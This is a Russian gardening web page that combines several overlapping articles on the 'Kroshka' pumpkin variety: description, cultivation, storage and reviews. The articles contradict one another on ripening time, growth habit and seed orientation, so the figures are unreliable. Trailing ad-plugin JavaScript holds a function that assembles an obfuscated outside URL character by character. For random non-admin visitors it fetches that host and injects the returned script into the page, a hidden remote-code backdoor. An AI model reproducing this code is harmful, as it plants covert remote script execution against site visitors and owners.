2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Сорт тыквы крошка

Тыква Крошка

Выращивая на дачных участках тыкву, обычно отдают предпочтение сортам и гибридам с плодами порционного размера: небольшую тыквину можно съесть или переработать за один раз, большие же экземпляры приходится разрезать, после чего хранятся они плохо и недолго. К одним из таких тыкв с некрупными и очень сладкими плодами относится известный сорт Крошка.

Тыква Крошка была выведена в начале 2000-х годов во ВНИИ орошаемого овощеводства и бахчеводства, который находится в Астрахани. Несмотря на то, что сорт рекомендован к выращиванию в Нижневолжском регионе, он может хорошо плодоносить и в сибирском саду.

Описание тыквы сорта Крошка

Холодостойкость. Благодаря высокой холодоустойчивости тыкву Крошка можно выращивать даже в регионах с неблагоприятным холодным климатом, например, в Ленинградской области.

Параметры растения. Крошка относится к плетистым типам тыквы. Главная плеть длинная, ее рост нужно ограничивать. Мощность роста средняя. Почковидные листья крупные, зеленые.

Сроки созревания. По срокам созревания Крошка относится к среднеспелым. Урожай этой тыквы снимают на несколько недель позже скороспелок. От момента появления ростков до уборки плодов проходит 115-125 дней.

Характеристика плодов. Тыквины считаются порционными, так как их вес достигает 2,5-3 кг. Они покрыты деревянистой светло-серой (иногда практически белой) корой с едва заметными розоватыми пятнами. Форма тыквы плоская, округлая. Плотная ярко-оранжевая мякоть не волокнистая, характеризуется сладким вкусом, сахаристостью. Плоды отлично хранятся в комнатных условиях.

Интересно!Показатель у Крошки считается стабильным. Независимо от погодных условий в течение сезона урожайность сорта остается высокой — 5-7 кг/м 2 .

Устойчивость к заболеваниям. Тыква Крошка устойчива к антракнозу (медянке) — грибковому заболеванию, симптомами которого являются желто-бурые пятна, поражающие всю надземную часть культуры.

Крошка по своим сортовым характеристикам приближена к нескольким другим сортам тыквы крупноплодной, обладающим хорошей холодостойкостью и имеющим средние сроки созревания. Для сравнения ниже приведены краткие описания похожих сортов.

  • Тыква Медовая Крошка. Очень часто производители посадочного материала обычную Крошку называют Медовой. Несмотря на то, что плоды этого сорта имеют аналогичные характеристики (вес, окраску, вкусовые качества), Медовая Крошка относится к кустовым тыквам, а Крошка — к плетистым.
  • Тыква Оранжевая Медовая. Так же, как и Крошка, относится к плетистому типу. Вкусовые качества, форма, вес и размеры плодов Оранжевой Медовой тоже аналогичны тыквинам Крошки. Только цвет корки совсем другой — яркий желто-оранжевый с зеленовато-желтыми полосами.

Оранжевая Медовая, Медовая Крошка характеризуются особой сладостью мякоти, повышенным содержанием каротина и сахаров в созревших тыквинах.

Агротехника выращивания

Агротехника выращивания на участке сорта Крошка мало чем отличается от посадки и ухода за другими сортами тыквы плетистой и считается традиционной.

Посев

Садить можно в грунт

Крошку можно высадить непосредственно в грунт или же посадить ее семена на рассаду. В последнем случае плодоношение тыквы начнется раньше. Посев семян в грунт производится только при достаточном нагреве почвы и обычно приходится на конец мая — начало июня, в зависимости от погодных условий.

Высадка рассады в открытый грунт проводится в этот же период. Чтобы вырастить саженцы в комнатных условиях, необходимо посеять семена в стаканчики за 4-5 недель до посадки: оптимальный возраст рассады составляет 25-30 дней. Семена нужно замочить на полчаса в слабом растворе марганцовки и сутки выдержать в теплой влажной ткани.

Подготовка посадочного места

Как и все другие тыквы, Крошка предпочитает солнечные безветренные участки и плодородную почву. Грядки рекомендуется формировать еще осенью: в них вносят перегной, компост и др.

Важно! В регионах с холодным климатом под тыкву отводят грядки высотой 20-25 см. Они быстрее прогреваются.

Перед посадкой в грунт нужно добавить минеральные удобрения и пролить. Когда земля осядет, можно приступать к посадке.

Посадка

Рекомендуемая схема посадки тыквы Крошка — 60×60 см. Глубина заделки семян в открытом грунте — около 4 см. Рассаду высаживают так, чтобы поверхность земляного кома находилась на одном уровне с поверхностью грунта. Поэтому после пролива лунок нужно подождать, пока земля осядет. В противном случае посадочный материал окажется заглублен.

Если предусмотрена высадка рассады, после посадки необходимо накрыть саженцы пластиковыми бутылками в качестве временного укрытия. Их снимают по истечении 4-5 дней, когда растения адаптируются к новым условиям.

Важно! Семена при посадке погружают в грунт острым концом вниз под углом 45 0 .

После посадки Крошка нуждается в уходе. Сорт довольно неприхотливый, но для получения богатого урожая необходимо соблюдать некоторые правила.

Полив и уход за тыквой

Полив и мульчирование. Тыква Кроха очень требовательна к поливам. При недостаточном количестве воды ее урожайность значительно снижается. Поэтому важно следить за тем, чтобы теплая вода хотя бы раз в неделю поступала в достаточной объеме под корень растения. Чтобы вода не испарялась из земли слишком быстро, сразу после посадки саженцев (или прорастания/ прореживания ростков) ее мульчируют: соломой, сухим сеном, опилками и т.п.

Важно! Под подрастающие плоды рекомендуется подкладывать дощечки для предотвращения гнили, но если грядку замульчировать, потребность в подложках отпадает.

Формирование. Так как Крошка является представителем плетистой разновидности тыквы, особое внимание при уходе следует уделить формировке основных стеблей. Их количество зависит от целей, преследуемых самим огородником:

  • для выращивания максимально крупных плодов нужно оставить один главный стебель, а остальные побеги и пасынки удалить. Ограничивают рост главной плети прищипыванием, отсчитав от крайнего плода 4-7 листов;
  • при выращивании Крошки в 2 и 3 стебля оставляют один или два самых сильных боковых отростка, все остальные удаляют. Главный стебель прищипывают после третьего плода, оставляя после него 4 листа, а боковые — после первой тыковки, оставляя 5 листьев.

Таким образом, после правильной прищипки на каждом растении развивается не более пяти тыквин. Все лишние цветки и завязи нужно своевременно удалять. При необходимости листву тоже можно проредить, чтобы плоды получали солнечный свет в достаточном количестве.

Важно! Главную плеть можно формировать только при условии, что ее длина составляет не менее 1,5 м.

Обычно формировка тыквы проводится без использования инвентаря.

Чтобы растение было более мощным, плети можно присыпать землей на расстоянии около 1 м от прикорневой зоны. В этих местах стебли дадут дополнительные корни.

Подкормки. Крошка хорошо отзывается на органические подкормки — разведенные в воде коровяк и навозную жижу, но использовать их можно только в период активного роста плетей и листьев. Когда тыквы начинают завязываться, нужно перейти на калий- и фосфоросодержащие подкормки.

За грамотную посадку и минимальный уход тыква Крошка отблагодарит богатым урожаем сладких порционных плодов.

Преимущества и недостатки сорта Крошка

К достоинствам этой тыквы можно отнести:

  • отличные вкусовые качества;
  • небольшой вес плодов, позволяющий их употреблять за один раз;
  • универсальность использования тыквин (из Крошки можно выжать тыквенный сок);
  • лежкость и транспортабельность;
  • холодостойкость и устойчивость к перепадам температур;
  • надежность сорта (стабильная урожайность).

Недостаток Крошки заключается в восприимчивости к мучнистой росе. Обнаружив признаки этого грибкового заболевания (белый или сероватый налет на листьях и стеблях), нужно незамедлительно провести опрыскивание тыквы раствором фунгицида, например, «Топаза». Крошка не будет подвержена заболеванию мучнистой росой, если ее семена и саженцы обработать в качестве профилактики растворами фунгицидов.

Сорт Крошка пользуется особой популярностью среди российских садоводов благодаря большому количеству достоинств и простоте ухода. Сладость плодов этой тыквы никого не оставляет равнодушным.

Выращивание тыквы Крошка

Тыква Крошка ценится овощеводами за хороший урожай и высокие питательные качества плодов. Ее применяют в приготовлении множества блюд, которые она отлично дополняет своей сладостью. Сорт устойчив к болезням и вредителям. Плоды отличаются высокой лежкостью и транспортабельностью.

Выращивание тыквы Крошка

Характеристика сорта

Тыква входит в категорию среднеспелых плетистых сортов, она кустовая с мощным и длинным основным стеблем. От первых всходов до достижения зрелости плодов должно пройти около 110-140 суток.

Культура не является крупноплодной: при правильном уходе тыквы могут достигать веса в 3 кг. Форма округлая, слегка приплюснутая сверху и снизу, цвет коры светло-серый с небольшими розовыми пятнами. Кожура прочная, но не слишком твердая, мякоть желто-оранжевая, сочная, зернистая и сладкая.

Семечки овальные, гладкие, белого цвета. Тыква сорта Крошка обладает ярким медовым вкусом и насыщенным ароматом, ее используют в приготовлении многих блюд, особенно в выпечке.

Достоинства и недостатки

Плюсами сорта являются сладкий вкус и внешний вид плодов. Также к его достоинствам относят:

  • плотную кожуру плодов;
  • хорошее качество лежкости;
  • обладает ярко выраженным медовым ароматом;
  • неприхотливость в уходе;
  • высокую устойчивость к болезням и вредителям;
  • хорошо переносит заморозки.

К недостаткам относят средние размеры плодов и цвет кожуры. Она не подойдет для украшения блюд. Оптимальным вариантом будет применение в кулинарии и выращивание для промышленного производства: соки, детское питание.

Выращивание

Для растений важно наличие солнечного света

Важно правильно выбрать место для посадки. Растение хорошо приживется в местах с большим количеством солнечного света и низким уровнем грунтовых вод.

Культура плохо растет в условиях сырости. Тыква кустовая, хорошо переносит заморозки и резкие перемены климата.

Подготовка к посадке

Перед посадкой семена тыквы Крошка нужно держать в мокрой салфетке или полотенце 24 часа. Далее приступают к созданию рассады. Для этого подойдут специально подготовленные емкости – это могут быть стаканчики или горшки.

После посадки емкости накрывают пленкой и держат в тепле. Семена важно сажать только острым кончиком вверх. После появления первых всходов пленку убирают и раз в сутки выносят стаканчики на улицу на 10-20 минут. Это делают, чтобы растение привыкло к другим условиям роста.

Если семена были посажены в теплице, ее следует проветривать, не допуская сильных сквозняков. В начале мая, когда появятся первые 2-3 листочка, можно выполнять пересадку в открытый грунт.

Посев

Перед началом высадки необходимо подготовить грядку. В нее нужно вносить органические или минеральные удобрения для лучшего роста культуры. Также она нуждается в обильном поливе.

В первое время после посадки культуру нужно укрывать. Для этого подойдут ведра или обрезанные бутылки. Это выполняют до тех пор, пока стебель не окрепнет.

Чтобы урожайность была выше, а вероятность заболевания снизилась, важно каждый год менять место выращивания. Главное – правильно выбрать почву, на которую будет выполняться пересаживание. Тыкве Крошка нужны безветренные и хорошо освещаемые места.

Во время выращивания тыквы садоводы рекомендуют выполнять прищипывание стебля, оставляя 2-3 завязи, чтобы культура хорошо росла и формировала плоды.

Тыква не требует особого ухода, ее следует только вовремя поливать, чтобы она не начала сохнуть. Если в почву перед посадкой не были внесены удобрения, то подкормку стоит выполнять несколько раз за сезон. В качестве подпитки можно использовать органику (навозную жижу и коровяк, разбавленные водой).

Сбор и хранение урожая

Плоды необходимо собрать до наступления заморозков

Сочные плоды собирают уже осенью, спустя 4 месяца после посадки, по мере их созревания. Согласно описанию тыквы Крошка, этот сорт считается среднеспелым и пригоден к долгому хранению.

Обычно урожай собирают в начале сентября до наступления первых заморозков. Если плоды подвергнутся холодам, это скажется на их хранении, они долго лежать не будут и быстро испортятся.

Также на сроки поспевания влияет климат: на юге тыкву в огороде держат до тех пор, пока не начнут сохнуть листья, после этого уже проводят сбор урожая. В этой местности заморозки поздние, поэтому они не несут никакой угрозы плодам.

Готовая к уборке тыква приобретает такие внешние признаки:

  • плодоножка должна быть сухой и твердой;
  • листья пожелтевшие или даже сухие;
  • цвет становится более насыщенным, серым;
  • кожура твердая и плотная.

Хранить плоды нужно в темном холодном помещении, для этого подойдет подвал или холодильник. Температура не должна превышать 20 °C.

Тыквы отличаются хорошей лежкостью и могут храниться до самой весны. Если во время сбора урожая плоды были недостаточно зрелыми, то они доспевают со временем и напитываются полезными элементами и витаминами.

Сорт тыквы Крошка

Полезная и вкусная тыква — хороший ингредиент и сочетается со многими продуктами. Вырастить овощ легко. Большинство дачников говорят, что особого внимания заслуживает тыква Крошка.Такое название она получила, потому что она считается самой маленькой среди крупноплодных сортов.

Сорт тыквы Крошка

Характеристика сорта

Сорт создали селекционеры Всероссийского НИИ.

Выращивать Крошку рекомендуется в Нижневолжском регионе, она зреет 85–95 дней.

Созревший плод весит от 2 до 4 кг. В период зрелости имеет правильную круглую форму, немного приплюснутую сверху и снизу. Кожица гладкая, серая (с нежно-розовыми пятнышками). Стебель толстый и длинный , лианы с большой широкой листвой.

В середине овощ суховат (сочность на низком уровне), мякоть ярко-желтого цвета, сладковатая.

Достоинства и недостатки сорта

Крошка – вкусная и сладкая тыква, в ней много витаминов и углеводов.

Сорт обладает положительными и отрицательными характеристиками, с которыми стоит ознакомиться, прежде чем приступать к выращиванию.

Достоинства Недостатки
  • толстая корочка и прочная мякоть — она не сминается;
  • может выращиваться в коммерческих целях и для промышленного использования (соки, детское питание и т. д.);
  • хорошо переносит транспортировку на дальние расстояния;
  • долго хранится, не подвергаясь гниению;
  • мякоть сладкая;
  • за тыквой легко ухаживать, она не требует много внимания;
  • обычно получают щедрый урожай.
  • такая тыква не подходит для украшения;
  • растение плохо переносит жару;
  • в период интенсивного роста культура подвержена грибковым заболеваниям;
  • важно соблюдать сроки сбора урожая.

Выращивание сорта

Описание технологии выращивания тыквы крошка.

  1. В начале мая замочите семена в мокрой марле на 3–4 дня (ткань должна весь срок оставаться увлажненной).
  2. Посадить растение можно в теплицу или в посудину, держа ее в теплом помещении. При выращивании в отдельной емкости следует соблюдать три правила: умеренное увлажнение, поддержка оптимальной температуры 15–18 °C.
  3. Семена помещают кончиком вниз.
  4. Когда в земле появятся всходы, пленку нужно снять, а растение выносить на улицу раз в день на несколько минут (15–20 мин.).
  5. Если культура растет в теплице, ее проветривают раз в 2 дня. При этом нужно избегать сквозняков и переохлаждения.
  6. Когда начнут появляться листочки, растение можно высадить на улицу в открытый грунт.

Если соблюсти все правила посадки и выращивания, уже ближе к сентябрю появятся сладкие плоды.

Подготовка к посадке в открытый грунт

Высаживать тыквы необходимо в солнечное место

Высадка в открытый грунт также требует соблюдения особых правил:

  • сажать нужно в безветренном и солнечном месте.
  • грядки выкапывают и подготавливают в начале осени, а также их нужно удобрить перегноем.
  • перед посевом семена замачивают в теплой воде и заворачивают в мокрую марлю на 24 часа.
  • Высаживают семена «носиком» вниз, вдавливать в грунт нельзя.

К предварительной обработке также входит обеззараживание семян — после того как материал выстоит в теплой, влажной ткани 24 часа, нужно на 2-3 часа опустить семечки в раствор марганца.

Готовят раствор так: на 250 г жидкости нужно добавить несколько кристаллов марганца.

Уход за тыквой

Полив

Раз в неделю нужно поливать тыкву под корень теплой водой. При этом важно следить за тем, чтобы почва не размывалась. Главное не переборщить.

Удобрение

Согласно описанию сорта, Крошка любит подкормку: удобряют тыкву натуральной смесью, в которую входит вода (10-12 л), коровяк — 200 г и навоз 200 г.

Используют подкормку в период активного роста. Если молодые листки начинают закручиваться, их можно подпитывать калием.

Сбор и хранение урожая

Чтобы понять, что овощ окончательно созрел, нужно попробовать корочку: если она твердая и не прогибается, то урожай можно собирать.

Важно не зацепить кожуру при сборе. Плоды срезают с подножкой, делать это нужно максимально аккуратно. Если на плодах есть царапины или вмятины, то их отправляют на переработку. Такие плоды быстро портятся.

Хранить плоды нужно в сухом помещении. Первые недели температура в комнате должна быть теплой, туда плод кладут на 2 недели, чтобы корочка окончательно затвердела, а хвостик подсох.

Овощ теряет 20% веса при хранении в теплой комнате. Через 14 дней его нужно перенести в прохладное помещение.

Температура должна быть от 3 до 8 °C, а влажность от 60 до 70%.

Плоды лучше держать в стеллажах, они должны быть покрыты соломой. А плоды лежать подножкой вниз.

Тыква Крошка

Сорт тыквы Крошка был выведен в 2000-х годах селекционерами из астраханского ВНИИ, предлагался для выращивания в районах Нижней Волги. Однако прекрасно «себя чувствует» и плодоносит на грядках даже сибирских огородников.

Тыква Крошка соединила в себе отличные вкусовые качества и много полезных свойств.

Описание и характеристика сорта

Понравится тем, кто любит не очень крупные, порционные плоды.

  1. Тыква Крошка — сорт среднепоздний, вызревает за 4 месяца.
  2. Растение плетистое, стелющееся. Стебли длинные, крепкие. Основную плеть требуется прищипывать.
  3. Для сорта характерна крепкая корка плодов. Она настолько твердая, как будто одеревенелая. Это позволяет без труда транспортировать тыкву. Поэтому ее выращивают не только огородники, но и фермеры крупных хозяйств, занимающиеся продажей овощей.
  4. Неприхотлив в выращивании, устойчив к основным болезням культуры, кроме мучнистой росы.

Свойства плодов и урожайность

Это одна из самых сладких столовых тыкв.

  1. Плоды непривычного серого цвета, круглые, с четко очерченными дольками, весом 2—3 кг. (Непонятно, откуда такое название).
  2. Ярко-оранжевая мякоть плотная, сладкая, маслянистая, со вкусом, напоминающим ореховый. Отсутствует характерный запах тыквы.
  3. Семечек немного, они белые, толстые, аппетитные.

Своим вкусом и ароматом Крошка придаст неповторимый оттенок любому блюду: разнообразит плов, манты. Ее употребляют в сыром виде, например в салатах. Из нее готовят изысканные запеканки, пюре, каши и многие другие кулинарные диковины.

Урожайность сорта неплохая. На одном растении могут вырасти 4—5 плодов весом от 1,5 кг до 3 кг.

Особенности выращивания

На юге страны тыква Крошка успевает вызреть, если сажать семечками прямо в грунт. Для посадок в районах с прохладным климатом и коротким летом, придется сначала вырастить рассаду.

  1. Семена начинают сеять как минимум за месяц до переноса на грядку. Рассаду сажают в грунт в конце мая или начале июня.
  2. Промежутки между растениями оставляют не менее метра.
  3. Место должно быть солнечным, а почва плодородной.

Если участок под посадку тыквы был приготовлен с осени: перекопан с органическими удобрениями, то дальнейший уход не доставит много хлопот.

Тыква не нуждается в подкормках. Растение нужно поливать, не допуская пересыхания почвы, удалять сорняки.

Нельзя забывать прищипывать главный стебель и боковые побеги. Огородники формируют плети по своему усмотрению (в зависимости от региона выращивания).

Осенью, до начала заморозков, тыква Крошка порадует садоводов красивыми аппетитными плодами.

Отзывы огородников

Огородники любят выращивать сорт Крошку у себя на грядках. Привлекает ее сладкий изысканный вкус, возможность любой кулинарной обработки, способность храниться длительное время.

Фермерам, выращивающим тыкву на продажу, нравится то, что ее несложно перевозить, сохраняя потребительские качества.

Даже ленивым садоводам пришелся по вкусу данный сорт, так как не доставляет много хлопот при выращивании, при этом радует урожаем.

Такой сладкой тыквы мы не ели еще никогда! Положив ее в кашу, я пожалела, что добавила в кашу сахар, хоть и немного. Если я запекаю ее, то всегда можно отличить по вкусу от других! Очень сладкая и вкусная! Моя мама просто ее ест вместо морковки, тыква очень полезна. — Большой вопрос(Elena­ pod)

Нравятся Крошка, кустовая оранжевая (правда, в этом году на пакете заявлен вес до 7 кг, но у меня пока больше 5кг не вырастали, хотя вызревали полностью и были очень вкусные)… — Форум Наша дача(Ария)

Крошку я сажала, очень понравилась. Из тех, что можно есть сырыми. Плоды 1-2 кг до 3кг. Очень удобны для фарширования, семенная камера маленькая, плотно забитая семенами, мякоть толстая, оранжевая. — Форум E1(Лена П)

Если кто-то из читателей сажал Крошку, поделитесь, пожалуйста, собственным опытом выращивания или кулинарными рецептами приготовления необычных блюд из этого овоща.

Описание и выращивание сорта тыквы «Крошка»

Тыква является любимицей многих дачников и профессиональных огородников. Она содержат в себе множество полезных элементов, а также подходит для приготовления блюд с ярким вкусом. Успех урожая зависит не только от хорошего ухода, но и сорта, который будет выбран для посадки. Многие отечественные огородники рекомендуют сорт тыквы «Крошка», который отличается крупными габаритами, сладким вкусом и простотой в уходе.

Характеристика сорта

Сорт среднегабаритной тыквы по иронии был назван «Крошкой», создан селекционерами Всероссийского НИИ и рекомендован к выращиванию в Нижневолжском регионе. Считается среднеспелым плетистым сортом и процесс созревания занимает около 120-130 дней.

Растение характеризуется мощным длинным стеблем с большими нерассеченными листьями. Плоды вырастают достаточно крупными до 2-4 кг. Обладает аккуратной выровненной круглой формой, слегка приплюснутой сверху и снизу. Кора достаточно плотная и имеет светло-серый оттенок с редкими бледно-розовыми пятнами. Мякоть насыщенного желто-оранжевого оттенка, плотная, не слишком сочная.

Гнездо под семена средних размеров. Сами семена имеют вытянутую овальную форму. Подходят для дальнейшей высадки и получения нового урожая.

Тыква «Крошка» обладает насыщенным ярким медовым вкусом. С ней легко экспериментировать и создавать кулинарные шедевры. Особой популярностью пользуется для запекания и приготовления блюд внутри коры тыквы.

Достоинства и недостатки

Главной положительной стороной сорта «Крошка» является то, что тыква обладает достаточно плотной корой и мякотью. Из-за этого ее часто выращивают фермеры-предприниматели и огородники, которые реализуют свою продукцию для продажи. Благодаря своей плотности, плоды тыквы отлично ведут себя во время транспортировки – не мнутся и не трескаются. Также тыква обладает высокими сроками хранения в подходящих для этого условиях.

Кроме того, большинство дачников выбирают сорт «Крошка» за её яркий, медовый вкус. В ней высокий процент сахаристости, и из нее получаются очень вкусные блюда. Особенно она нравится детям.

Тыква неприхотлива в уходе и требует к себе мало внимания в процессе выращивания. Подходит для выращивания новичками и опытными огородниками. Имеет хороший отклик у тех и у других.

Из недостатков можно выделить её средние размеры и цвет коры – она не подойдет для украшения, а имеет сугубо столовое назначение.

Выращивание и уход

В первых числах мая необходимо заранее замочить семена тыквы сорта «Крошка» во влажной салфетке или полотенце комнатной температуры. После приступить к выращиванию рассады. Для этого можно посадить семечки в теплицу или в специально подготовленные емкости, которые после укрываются пленкой и хранятся в теплом месте до первых всходов. Сажать семена необходимо строго тупым кончиком в землю, чтобы обеспечить благоприятные условия для всходов будущих ростков.

Как только появятся первые всходы, пленку следует убрать, а емкости выносить на улицу раз в день на 10-15 минут, чтобы растение привыкло к уличным условиям. В случае если рассада была посажена в теплице, её следует проветривать, не создавая сильных сквозняков. В конце мая, когда на рассаде будет 2-3 листочка, можно высаживать тыкву в открытый грунт.

Грядку можно заранее подкормить органическими или минеральными удобрениями, после высадить рассаду и обильно полить.

Первое время растение необходимо укрывать. Рекомендуется воспользоваться пленкой, ведрами или обычными срезами бутылок. Как только стебель растения окрепнет, брезент больше не понадобится.

В процессе выращивания профессиональные огородники советуют прищипывать стебель и оставлять 2-3 завязи, чтобы тыква сформировалась вовремя и была сладкой. Далее о растении можно забыть, лишь изредка вовремя поливая. Подкормку, как правило, тыква не требует, если рассада сажалась в заранее удобренную почву.

К осени тыква «Крошка» порадует своих владельцев ровными аппетитными тыковками.

Отзывы

Покупатели отзываются о тыкве сорта «Крошка» положительно. В первую очередь выделяют её сладкий выращенный вкус и способности к долгому хранению. Процесс выращивания не отнимает много сил и радует качественным урожаем. Кора у тыквы плотная, а мякоть сочная, и из нее получаются вкусные блюда, которые нравятся всей семье.

Также эта тыква пользуется популярностью у фермеров, которые выращивают ее специально на продажу.

Негативных отзывов в интернете не наблюдается. Единственное, что можно отметить – такая тыква не годится в качестве интересного украшения к октябрьским праздникам.

Обзор сорта тыквы «Крошка» смотрите в следующем видео.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};